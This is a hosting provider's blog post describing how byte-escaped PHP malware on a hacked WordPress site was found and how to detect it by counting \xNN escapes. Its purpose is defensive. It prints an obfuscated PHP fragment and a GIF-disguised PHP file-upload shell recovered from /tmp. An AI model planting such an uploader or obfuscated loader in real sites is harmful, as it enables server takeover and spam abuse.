← Back to the Blog

Byte encoding exploits in PHP files

By Sid Young
Byte encoding exploits in PHP files

Despite better coding practices, testing and peer review of code, the number of exploit attempts and the technical complexity of attacks continues to increase against web sites. With the rise in exploit attempts comes a rise in the requirements of malware and anti-virus scanners on the web server to detect and isolate the infected files.

Malware detection has been a serious business for decades and does not look like ending any time soon so IT professionals are constantly kept busy trying to detect and remove exploit attempts.

Recently one of the Wordpress web sites we host was exploited via a vulnerable plug-in. The exploit was designed to constantly send SPAM emails, so it attached back to a server and then received a list of email address to send specially formatted SPAM messages. The initial scan of the code base did not pick up the Malware as the PHP code was encoded in a previously unseen encoding method but a visual look at the file showed it used an excessive number of byte-escaped characters.

Many scanners are looking for base64 encoding, this file snippet below shows what a typical base64 encoded PHP file might contain:

<?php eval(gzuncompress(base64_decode

The byte encoded file however looks something like this:

<?php ${"\x47\x4cO\x42A\x4c\x53"}["cgw\x71\x77\x77\x64\x79q"]="\x69p";

Dissecting the first few lines of the code we can see traces of PHP command strings but randomly dispersed:


After some simple character conversions (\x41=A, \x42=B etc) we get:


Dissecting the lower case characters strings reveals:


Clearly we can see how the code is manipulated into random variable names but the keywords themselves are also manipulated with some parts byte encoded and other characters left un-encoded so that pattern matching is difficult at best.

There is however a simple solution, the mere fact that is has used a byte encoding method is not normal practice, you will be hard pressed to find this style of programming in any normal program with the exception of encryption code which uses a lot of hex encoded tables. So the frequency of \xNN character strings is far above normal.

A word count of each file results in an interesting “\xNN” % calculation, using the first infected file, we get the following:

#cat suspect-file.php| wc -c

Counting up the \x's we get:

#cat suspect-file.php| tr -dc '\\x'| wc -c
#cat suspect-file.php| tr -dc '\\x'| tr -dc 'x' | wc -c

Converting that to a percentage gives (3803/24348)*100 = 15.62% rounded

At 15% the presence of \xNN values is far to high for a normal PHP program (excluding encryption code files), a quick check of PHP files on the web server yields an average of less than 2% of byte encoded data per file, most files having below 1% and cache small files where found to have as high as 5% due to the additional encoded data the cache app was using, so we can exclude these.

Detecting this type of exploit attempt is now a simple matter of determining the percentage of encoded bytes per normal program code and flagging the file for more exploration later.

A simple script to scan all changed files in the web server document root and then run it to check for files changed in the last 7 days should provide an adequate method till the next round of exploits develop.


How did the exploit get there?

A check of the /tmp directory by the Malware scanner found this file:

# cat /tmp/phpt2oYQG
?GIF89a u
<?php @copy($_FILES[file][tmp_name], $_FILES[file][name]); exit; ?>

A simple upload of a bogus “GIF” file with PHP code inside is the first step, if the attacker can activate the code then they can activate the uploaded exploit and they are in business.

Multiple scanning attempts will pickup both exploits and attempted exploits, we schedule these to occur on all servers everyday, this allows us to tighten our system security on a daily basis.